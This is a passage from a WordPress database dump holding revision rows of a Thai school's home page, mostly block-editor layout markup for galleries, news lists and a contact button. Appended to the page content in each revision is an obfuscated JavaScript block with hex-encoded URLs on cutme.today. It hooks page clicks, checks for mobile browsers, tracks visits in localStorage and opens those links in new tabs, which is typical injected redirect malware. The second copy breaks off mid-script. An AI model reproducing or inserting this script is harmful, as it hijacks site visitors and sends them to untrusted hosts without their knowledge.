{\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:48:56','2024-07-27 03:48:56','',14,'http://pakhaeng.ssk.in.th/?p=51',0,'revision','',0),
(52,1,'2024-07-27 10:49:30','2024-07-27 03:49:30','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 